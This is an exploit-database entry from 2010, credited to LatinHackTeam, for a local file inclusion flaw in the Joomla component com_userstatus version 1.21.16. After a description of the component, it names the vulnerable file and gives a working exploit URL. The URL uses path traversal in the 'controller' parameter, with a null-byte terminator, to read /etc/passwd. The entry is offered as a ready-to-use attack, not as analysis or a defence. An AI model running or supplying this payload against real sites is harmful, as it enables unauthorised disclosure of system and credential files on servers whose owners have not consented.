Joomla Component com_userstatus Local File Inclusion

2010-04-01T00:00:00
ID 1337DAY-ID-11561
Type zdt
Reporter Chip D3 Bi0s
Modified 2010-04-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ====================================================
Joomla Component com_userstatus Local File Inclusion
====================================================

---------------------------------------------------------------------------------
Joomla Component User Status Local File Inclusion
---------------------------------------------------------------------------------
 
Author      : Chip D3 Bi0s
Group       : LatinHackTeam
Email & msn : [email protected]
Date        : 31 March 2010
Critical Lvl    : Moderate
Impact      : Exposure of sensitive information
Where       : From Remote
---------------------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
Application : User Status
version     : 1.21.16
Developer   : Mo Kelly
License     : GPL            type  : Commercial
Price       : 10.00 USD
Date Added  : 27 March 2010
Download    : http://joomlamo.com/joomlamo/downloads/cat_view/6-other-joomla-components-modules-and-plugins.html
 
 
 
Description     :
 
The component back end allows the entry of locations. Also assigning users to a location is done in the back end.
Users that are not assigned a location do not show up in the User Status Screen.
 
After creating locations and assigning users you may view their status from the front end.
Create a menu selection with user User Status component.
 
There is a separate module to allow users to update their status.
 
Another module, "Refresh Page" makes sure that the user status screen accurately reflects users status.
 
A User's status must be updated to change, it will not expire with the user session.
 
 
--------------
file error  : components/com_userstatus/userstatus.php
 
how to exploit
 
http://127.0.0.1/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
 
------------------------
 
 
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-01-17]  #